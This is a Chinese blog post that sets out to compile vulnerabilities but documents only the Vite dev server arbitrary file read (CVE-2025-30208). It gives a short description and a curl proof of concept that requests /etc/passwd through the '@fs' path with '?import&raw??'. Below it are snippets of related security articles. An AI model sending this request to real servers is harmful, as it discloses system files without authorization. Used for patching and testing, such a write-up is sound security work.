自己整理的一些漏洞

最新推荐文章于 2025-05-23 21:52:45 发布
最新推荐文章于 2025-05-23 21:52:45 发布
阅读量154 收藏 3
点赞数 5
文章标签: 安全性测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/tainqiuer123/article/details/146908569
版权

一、Vite开发服务器任意文件读取漏洞(CVE-2025-30208)

漏洞描述:Vite是一个现代前端构建工具,为Web项目提供更快、更精简的开发体验。它主要由两部分组成:具有热模块替换(HMR)功能的开发服务器,以及使用Rollup打包代码的构建命令。在Vite 6.2.3、6.1.2、6.0.12、5.4.15和4.5.10版本之前,用于限制访问Vite服务允许列表之外的文件的server.fs.deny功能可被绕过。通过在URL的@fs前缀后增加?raw??或?import&raw??,攻击者可以读取文件系统上的任意文件。

POC:

curl 'http://ip:port/@fs/etc/passwd?import&raw??' \
-H 'Accept:text/html,application/xhtml+xml,application/xml;q-0.9,imageawif,image/webp,image/apng,*/*;q-0.8,application/signed-exchange;v-b3;q-0.7' \
-H 'Accept-language;zh-CN;zh;q=0.9' \
-H 'Connection:keep-alive' \
-H 'Upgrade Insecure Requests:1' \
-H 'User-Agent:Mozilla/5.0 (Windows NT 10.0;Win64; x64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/134.0.0.0 Safari/537.36'

AdaTina
关注
spring框架漏洞整理
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-01 1536
近日, Spring官方发布多个安全公告其中包括3个严重,2个高危漏洞漏洞涉及Spring Messaging组件, Spring Security框架,spring框架漏洞整理,攻击者可通过这些漏洞实施远程代码执行攻击、拒绝服务攻击及获取敏感信息等。 Spring Messaging组件中存在漏洞可导致正则表达式拒绝服务攻击(CVE-2018-1257)Spring是一个开放源代码的设计层面框架,他解决的是业务逻辑层和其他各层的松耦合问题,因此它将面向接口的编程思想贯穿整个系统应用。
spellchecker.php 漏洞,整理一些大汉版通的漏洞
weixin_39990819的博客
04-13 3468
1.sql注入/vc/vc/interface/index/que_scount.jsp?webid=1/jcms/short_message/que_contact.jsp?vc_searchname=1/jcms/short_message/que_recemsg.jsp?que_keywords=1&loginid=a/jcms/workflow/design/que_model.j...
jQuery漏洞复现整理
热门推荐
网安君的博客
02-23 1万+
平时Acunetix会扫出来很多 Vulnerable JavaScript libraries中危漏洞,JavaScript一般存在的都是XSS漏洞,那么如何去在报告中体现出这个漏洞呢,具体内容如下文。 JavaScript XSS Demo <!DOCTYPE html> <html lang="zh"> <head> <meta charset="UTF-8"> <meta name="viewport" content="wid
常见安全漏洞整理
qq_42778289的博客
05-08 3300
CSRF(Cross-site Request Forgery,跨站请求伪造)挟持用户在当前已登录的Web应用程序上执行非本意操作的攻击方法,可简单描述为“攻击者盗用了你的身份,以你的名义发送恶意请求”。逻辑漏洞没有固定的套路,泛指定义了一组业务规则,但没做好校验,让恶意用户绕过规则造成损失的漏洞。可产生各种危害,比如窃取系统财产、窃取别的用户隐私等。Cross-Site Scripting(跨站脚本攻击)简称 XSS,是一种代码注入攻击。
红队中的一些重点系统漏洞整理(通用的一些漏洞
weixin_50464560的博客
03-27 1308
本文转载自:https://github.com/r0eXpeR/redteam_vul以下时间为更新时间,不代表漏洞发现时间.带 ⚒️图标的为工具URL.配合EHole(棱洞)-红队重点攻击系统指纹探测工具使用效果更佳:https://github.com/EdgeSecurityTeam/EHole此项目同步至:https://forum.ywhack.com/bountytips.php?Vulnerability一、OA系统泛微(Weaver-Ecology-OA)[2021.01.07]
解析漏洞整理
fendo
02-28 6606
1.什么是解析漏洞 以其他格式执行出脚本格式的效果。 2.解析漏洞产生的条件 1.命名规则 2.搭建平台 3.常见的解析漏洞 (一)IIS5.x-6.x解析漏洞 使用iis5.x-6.x版本的服务器,大多为windows server 2003,网站比较古老,开发语句一般为asp;该解析漏洞也只能解析asp文件,而不能解析aspx文件。
WEB 常见漏洞整理
the_world_go的博客
09-26 1427
简单整理一下常见web漏洞
登录逻辑漏洞整理集合
qq_56426046的博客
02-21 2705
如果忘记你那么容易,那我爱你干嘛!2、不安全验证邮箱/手机号。3、MVC数据对象自动绑定。4、Unicode字符处理。1.未验证邮箱/手机号。1、cookie未鉴权。5.前端验证审核绕过。2、验证码、密码回显。2、cookie鉴权。
服务器漏洞整理
lms_de的博客
03-20 2436
服务器漏洞整理 记录下扫描出来的各种漏洞和解决测试方法 一、php+apache php5+apache2.4.6的版本太老,升级到php7和apache2.4.46能解决95%的漏洞。 php升级 直接上升级脚本,其中复制配置文件那两行行不能直接用, 配置文件php.ini根据需求自己改: #!/bin/sh echo "########## Stop httpd mysqld php-fpm ##########" #停止apache服务 sudo systemctl stop
被攻击的一些重点系统漏洞整理
鱼的博客
08-18 1507
一、OA系统 泛微(Weaver-Ecology-OA) ???? 泛微OA E-cology RCE(CNVD-2019-32204) - 影响版本7.0/8.0/8.1/9.0 https://xz.aliyun.com/t/6560 ???? 泛微OA WorkflowCenterTreeData接口注入(限oracle数据库) https://zhuanlan.zhihu.com/p/86082614 ???? 泛微ecology OA数据库配置信息泄露 https://www.cnblogs.co
红队中易被攻击的一些重点系统漏洞整理.pdf
03-24
本文件整理了一系列在红队攻击中最易被利用的系统漏洞,主要关注OA系统以及电子邮件服务器Exchange中的一些关键漏洞。 首先,文件中提及的OA系统主要指的是办公自动化系统,这是企事业单位日常工作中用于提高工作...
红队中易被攻击的一些重点系统漏洞整理
08-29
红队中易被攻击的一些重点系统漏洞整理
Discuz漏洞整理.pdf
11-15
Discuz漏洞整理,基本囊括了所有已知discuz漏洞,推荐人群为:渗透测试工程师/安全研究员
业务安全漏洞整理.7z
02-24
业务安全漏洞是网络安全领域中的一个重要话题,特别是在Web应用程序中,这些问题可能会导致敏感数据泄露、用户权限滥用、系统瘫痪等严重后果。以下是对"业务安全漏洞"这一主题的详细阐述。 首先,我们要理解业务...
wLHK-Dedecms漏洞整理.pdf
09-20
wLHK-Dedecms漏洞整理 从给定的文件信息中,我们可以看到该文件是关于Dedecms漏洞整理报告,包含了多个漏洞的详情,包括SQL注入漏洞、XSS漏洞等。下面我们将对这些漏洞进行详细的分析和解释。 首先,我们来看第...
系分论文《论软件系统的安全性测试方法》
pccai的博客
05-23 986
本文从软件安全测试的视角出发,结合项目的实际需求,系统阐述了渗透测试漏洞评估等关键技术的应用过程。
第五讲电子商务安全.ppt
05-26
第五讲电子商务安全.ppt
运用Matlab的LBP算法实现面部表情识别与特征分割 图像处理 指南
05-26
内容概要:本文探讨了利用Matlab和LBP(局部二值模式)算法进行面部表情识别的技术。首先介绍了Matlab作为一种强大工具,在科学计算和图像处理领域的广泛应用背景。接着详细阐述了LBP算法的工作原理及其在图像分析中的优势,特别是对于描述图像局部纹理特征的能力。随后重点讲解了LBP算法在脸部特征分割中的具体步骤,包括图像预处理、特征提取以及最终的表情识别过程。通过对一系列实验数据的分析,证明了这种方法的有效性和准确性。 适合人群:从事计算机视觉、图像处理相关工作的研究人员和技术爱好者。 使用场景及目标:适用于需要对面部表情进行自动识别的应用场合,如安防监控、人机交互系统等。目标在于提供一种高效可靠的面部表情识别解决方案。 其他说明:文中提到的LBP算法不仅能够很好地捕捉到人脸的关键部位特征,而且还能有效地减少噪声干扰,提高了识别率。此外,作者还展望了未来可能的研究方向,比如优化现有算法以提升性能表现。
MATLAB微网优化调度:两阶段鲁棒CCG算法经济调度的详细研究 说明
最新发布
05-26
内容概要:本文深入探讨了基于MATLAB的微网优化调度,特别是采用两阶段鲁棒优化模型和CCG算法来实现经济调度。通过构建min-max-min结构的两阶段鲁棒优化模型,考虑储能、需求侧负荷及可控分布式电源的运行约束和协调控制,并引入不确定性调节参数,使调度方案能够适应不同场景。利用列约束生成算法和强对偶理论,将原问题分解为主问题和子问题交替求解,提高了求解效率。最终,在MATLAB平台上利用YALMIP工具箱调用CPLEX求解器进行了仿真分析,验证了模型和算法的有效性。 适合人群:从事电力系统优化调度的研究人员和技术人员,尤其是对微网优化调度感兴趣的学者和工程师。 使用场景及目标:适用于需要优化微网调度策略,降低成本并提高能源利用效率的实际应用场景。目标是在最恶劣场景下找到运行成本最低的调度方案,同时确保系统的稳定性。 其他说明:本文提供的代码注释详实,出图效果好,适合用于教学和科研项目。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值